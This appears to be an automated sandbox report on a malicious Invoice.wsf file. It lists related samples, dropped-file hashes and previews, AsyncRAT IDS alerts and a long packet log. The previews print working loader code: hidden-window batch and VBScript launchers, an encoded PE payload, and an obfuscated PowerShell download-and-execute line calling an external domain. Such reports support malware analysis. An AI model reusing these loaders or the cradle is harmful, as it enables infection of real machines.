                                  Nettably.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 192.185.141.13
                                  DHL Page1.exeGet hashmaliciousGuLoaderBrowse
                                  • 192.185.141.13
                                  37f463bf4616ecd445d4a1937da06e19x64_installer__v4.6.0.msiGet hashmaliciousUnknownBrowse
                                  • 192.185.141.13
                                  SHIPMENT_DOCMSS24071327.exeGet hashmaliciousGuLoaderBrowse
                                  • 192.185.141.13
                                  hhs.exeGet hashmaliciousUnknownBrowse
                                  • 192.185.141.13
                                  x64_installer__v4.5.9.msiGet hashmaliciousUnknownBrowse
                                  • 192.185.141.13
                                  3Ojkq6hcM1.msiGet hashmaliciousUnknownBrowse
                                  • 192.185.141.13
                                  Nettably.exeGet hashmaliciousSnake KeyloggerBrowse
                                  • 192.185.141.13
                                  WEAREX_IHRACAT.exeGet hashmaliciousGuLoaderBrowse
                                  • 192.185.141.13
                                  Fordybendes.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                  • 192.185.141.13
                                  AyyPZaqgaZ.exeGet hashmaliciousUnknownBrowse
                                  • 192.185.141.13

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):315
                                  Entropy (8bit):5.308667166542677
                                  Encrypted:false
                                  SSDEEP:6:PI2z8xKWK2z8xKWuR9bGnIvWWk2z8xKWcII1R3KbQO0cvfp1aHI2z8xKW9o22z8P:PJ1W31Wu7SnIOWV1WhI1kbQpcvf81W9T
                                  MD5:2062501BEC7ADC309CD1F6EBD3580828
                                  SHA1:4A9AC3E0C999D58F906A862A8913103BF276BC77
                                  SHA-256:2169D67A0981628B880CB1E75F7A7F3E57F6C0C2FE460DD1F4641F2DFFC0E682
                                  SHA-512:0AC1CB54C8FB199AFD74829CE6DF2AC2A01E8DB4923A70D5B6A4099A5A6A799AA52D8AA53D1D54EAB259108781D380ABB0673A983EA77FF851B4666E51A8B57E
                                  Malicious:true
                                  Reputation:low
                                  Preview:@e%mtOR0ZGTUhkVGJGcFhUVmRSTUZsV%%mtOR0ZGTUhkVGJGcFhUVmRSTUZsV% off..set "ps=powershell.exe"..set "mtOR0ZGTUhkVGJGcFhUVmRSTUZsVms=-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass"..set "cmd=C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1"..%ps% %mtOR0ZGTUhkVGJGcFhUVmRSTUZsVms% -Command "& '%cmd%'"..exit /b..

                                  C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with very long lines (65532), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):721496
                                  Entropy (8bit):2.8359815979042398
                                  Encrypted:false
                                  SSDEEP:3072:4ub2ylcESmDwZmT8VjG3/Dyqr4cwt9aU0rBx2ucmmwc0/Kz0o+i/6n/cEyjBAMDW:fFOTs8TP2LWTM5mH9OdHUb3ngoW
                                  MD5:DD8145AA6657C57C611CF17D7961C4A2
                                  SHA1:8BA331812C538B9410BA8403AB5C7ADE1724AD9D
                                  SHA-256:38D25461337F160AD0066389C93CADCCA66F3E08C04DCE8D2869B019B841B92E
                                  SHA-512:6614621189BB824B337AF5B0C6C667C505A78CCB8CCAFE1EDBB16F3F1775CD357452FFE82CCE4F12D643254E2783957FE08E9B66A9D25C967EDCECD96287A63B
                                  Malicious:true
                                  Reputation:low
                                  Preview:....$Mordexstring_ojj = "4D%&%5A%&%90%&%00%&%03%&%00%&%00%&%00%&%04%&%00%&%00%&%00%&%FF%&%FF%&%00%&%00%&%B8%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%40%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%80%&%00%&%00%&%00%&%0E%&%1F%&%BA%&%0E%&%00%&%B4%&%09%&%CD%&%21%&%B8%&%01%&%4C%&%CD%&%21%&%54%&%68%&%69%&%73%&%20%&%70%&%72%&%6F%&%67%&%72%&%61%&%6D%&%20%&%63%&%61%&%6E%&%6E%&%6F%&%74%&%20%&%62%&%65%&%20%&%72%&%75%&%6E%&%20%&%69%&%6E%&%20%&%44%&%4F%&%53%&%20%&%6D%&%6F%&%64%&%65%&%2E%&%0D%&%0D%&%0A%&%24%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%50%&%45%&%00%&%00%&%4C%&%01%&%03%&%00%&%76%&%6A%&%7A%&%64%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%00%&%E0%&%00%&%02%&%01%&%0B%&%01%&%08%&%00%&%00%&%FC%&%00%&%00%&%00%&%0A%&%00%&%00%&%00%&%00%&%00%&%00%&%8E%&%1A%&%01%&%00%&%00%&%20%&%00%&%00%&%00%&%20%&%01%&%00%&%00%&%00%&%40%&%00%&%00%&%20%&%00%&%00%&%00%&%02%&%00%&%00%&%04%&%00%&%00%&%

                                  C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):710
                                  Entropy (8bit):4.91192106973685
                                  Encrypted:false
                                  SSDEEP:12:VtAFNUupNO4gLM9Zdt4m1WjhI1O9ZgT3MBdx9Z+/SpR9TzFdWNc5RNey/Spn:/AYupw42uW2T3MP4/QvMmRNZ/6
                                  MD5:6E2F0A89BCEF654A94599920F97E90BB
                                  SHA1:FFB9C0D001F8DD2E3C808240C41A8FEE8B171987
                                  SHA-256:BDC5D6C3EBA7F0DB4E49A30B13C92EDD2DA563209836593B0579867E0E32A1C7
                                  SHA-512:B00E38B4A3161253788CC20F3E79D8CC25F8C5F155A3CEBCFB73B369E266C4932A177C2932B5F63A6F204E7308144AA33ECD5CB320AF05C85BA0437DBCE47619
                                  Malicious:true
                                  Reputation:low
                                  Preview:on error resume next..Function CreateWshShellObj().. Dim objName.. objName = "WScript.Shell".. Set CreateWshShellObj = CreateObject(objName)..End Function....Function GetFilePath().. Dim filePath.. filePath = "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat".. GetFilePath = filePath..End Function....Function GetVisibilitySetting().. Dim visibility.. visibility = 0.. GetVisibilitySetting = visibility..End Function....Function RunFile(wshShellObj, filePath, visibility).. wshShellObj.Run filePath, visibility..End Function....Set wshShellObj = CreateWshShellObj()..filePath = GetFilePath()..visibility = GetVisibilitySetting()..Call RunFile(wshShellObj, filePath, visibility)..

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\jxs[1].txt

                                  Download File
                                  Process:C:\Windows\System32\wscript.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):526
                                  Entropy (8bit):5.620453843160039
                                  Encrypted:false
                                  SSDEEP:12:WMvt8Vie7JJOaRHNgpTMvo180Y3ohFM2X0YRKU7:WRVikvZRAZ18h3oz/h97
                                  MD5:AC19581F1EA403DF757785454A1FBEDF
                                  SHA1:98930A10D26A35067108F38E16C53741B6CC2C1B
                                  SHA-256:5A8CD7C1A5FCB4884B7E391CD2621D2A839A6BBAAFE3FB5986E2E4CC23D882B3
                                  SHA-512:85F241CC2CD4401704FDEF1DBCB42A8BF40B6F17A151D89449FA52EC22BF9EDDFAA154AF7E56A13295440307A7DBF271429D30BDD6203E154810CFFC71BB76A3
                                  Malicious:false
                                  Reputation:low
                                  Preview:..Dim odqeo(5), qQsxY, i....' 1111111..odqeo(0) = "[BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B"..odqeo(1) = "456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-"..odqeo(2) = "@-@-@-$-%^(''https://afclifescience-tiurma."..odqeo(3) = "com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRI"..odqeo(4) = "NG');[BYTe[]];IeX($A123+$B456+$C789)"....' 1111111..qQsxY = ""..For i = 0 To 5 - 1.. qQsxY = qQsxY & odqeo(i)..Next..' 1111111..Set Pictures = CreateObject("WScript.Shell")..Pictures.Run "POWeRSHeLL " & qQsxY, 0, True..Set Pictures = Nothing..

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aazunhzh.wbw.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oigrrk00.nff.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnyh40io.11q.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ziurkhoa.qnq.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  Static File Info

                                  General

                                  File type:Unicode text, UTF-8 text, with very long lines (7092), with CRLF line terminators
                                  Entropy (8bit):5.071670029555159
                                  TrID:
                                    File name:Invoice.wsf
                                    File size:92'162 bytes
                                    MD5:0f1b72e0372d3d3e8821218284638861
                                    SHA1:b136b689cb0fbf9558c4b7860ddca264d53c156c
                                    SHA256:20e31873e4b69f416a7c31d9b35be80f8db14e7b28f440a43ca3c294abe892e8
                                    SHA512:b927b9e6a25e5fbc19c86aacb34c9af485bbb90248e150a3565387b03dbd559cd9f20555491082b81535057d2405ea0a3f55e4d8bb7800cc7bd1f3963065c84f
                                    SSDEEP:1536:5ZZZZZZZZZZZVZZZZZZZZZZZEZZZZZZZZZZZzaZZZZZZZZZZZSZZZZZZZZZZZVZ/:Wb
                                    TLSH:4193ADD5B89E02518DC1DE89D97DFE91E60842233F6B1D5367FEAF4C83256BC8607888
                                    File Content Preview:J,,D ,S, ,N ,,,FD ,VV, , I , , MN KR ,, , QC,F, RX , ,,X ,, QR,P , ,,V,,VN ,, C , N , ,,NDI,JQ, H,, W ,G,, YQ,V T,,R ,,MA AW,GUE, H,O MRI,FU,,Y U , ,EI,R, OLK VJC,,,W, , ETF,X, M ,,,N,, O,,C ,J , E C,S, , OIM AX ,,,,C, ,MPHF , ,,M

                                    File Icon

                                    Icon Hash:68d69b8f86ab9a86

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                    2024-08-29T19:42:20.837888+0200TCP2842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)1770749738104.243.37.177192.168.2.4
                                    2024-08-29T19:42:20.837888+0200TCP2030673ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)1770749738104.243.37.177192.168.2.4
                                    2024-08-29T19:42:20.837888+0200TCP2035595ET MALWARE Generic AsyncRAT Style SSL Cert1770749738104.243.37.177192.168.2.4
                                    2024-08-29T19:42:20.837888+0200TCP2035607ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)1770749738104.243.37.177192.168.2.4

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 29, 2024 19:41:53.671849012 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:53.671884060 CEST44349730192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:53.671983004 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:53.691926956 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:53.691940069 CEST44349730192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:54.198877096 CEST44349730192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:54.198980093 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:54.253711939 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:54.253727913 CEST44349730192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:54.254065990 CEST44349730192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:54.254236937 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:54.256017923 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:54.300513029 CEST44349730192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:54.401576042 CEST44349730192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:54.401633978 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:54.401643038 CEST44349730192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:54.401667118 CEST44349730192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:54.401681900 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:54.401704073 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:54.403182030 CEST49730443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:54.403198004 CEST44349730192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:56.342338085 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:56.342391968 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:56.342474937 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:56.350377083 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:56.350393057 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.042906046 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.042987108 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.044802904 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.044812918 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.045042038 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.052211046 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.092502117 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.178239107 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.178261995 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.178317070 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.178330898 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.197326899 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.197381020 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.197388887 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.241508007 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.264502048 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.264511108 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.264589071 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.266032934 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.266040087 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.266094923 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.284188986 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.284197092 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.284271955 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.284575939 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.284584045 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.284635067 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.361458063 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.361542940 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.361989975 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.362050056 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.362993002 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.363048077 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.363977909 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.364036083 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.364964962 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.365020990 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.366770983 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.366828918 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.371159077 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.371216059 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.372600079 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.372661114 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.448113918 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.448191881 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.448748112 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.448806047 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.449306965 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.449362040 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.450191975 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.450244904 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.451085091 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.451148033 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.451956034 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.452006102 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.457938910 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.457997084 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.458738089 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.458789110 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.459455013 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.459512949 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.499305010 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.499396086 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.534804106 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.534989119 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.535315990 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.535370111 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.535862923 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.535917044 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.536185980 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.536238909 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.536921978 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.536973000 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.537796021 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.537861109 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.539047003 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.539093971 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.539112091 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.539119959 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.539136887 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.539158106 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.539562941 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.539624929 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.540431976 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.540496111 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.541119099 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.541176081 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.544444084 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.544511080 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.544662952 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.544718027 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.545061111 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.545123100 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.545630932 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.545685053 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.545872927 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.545921087 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.548079014 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.548120022 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.621680021 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.621752024 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.621925116 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.621993065 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.622477055 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.622535944 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.622812986 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.622876883 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.623028994 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.623085976 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.623372078 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.623416901 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.623430014 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.623436928 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.623461008 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.623481035 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.623960018 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.624021053 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.624504089 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.624558926 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.624561071 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.624571085 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.624609947 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.625119925 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.625157118 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.625178099 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.625185013 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.625195026 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.625212908 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.631493092 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.631550074 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.631741047 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.631797075 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.631969929 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.632025003 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.632379055 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.632436991 CEST49731443192.168.2.4192.185.141.13
                                    Aug 29, 2024 19:41:57.708273888 CEST44349731192.185.141.13192.168.2.4
                                    Aug 29, 2024 19:41:57.708337069 CEST49731443192.168.2.4192.185.141.13
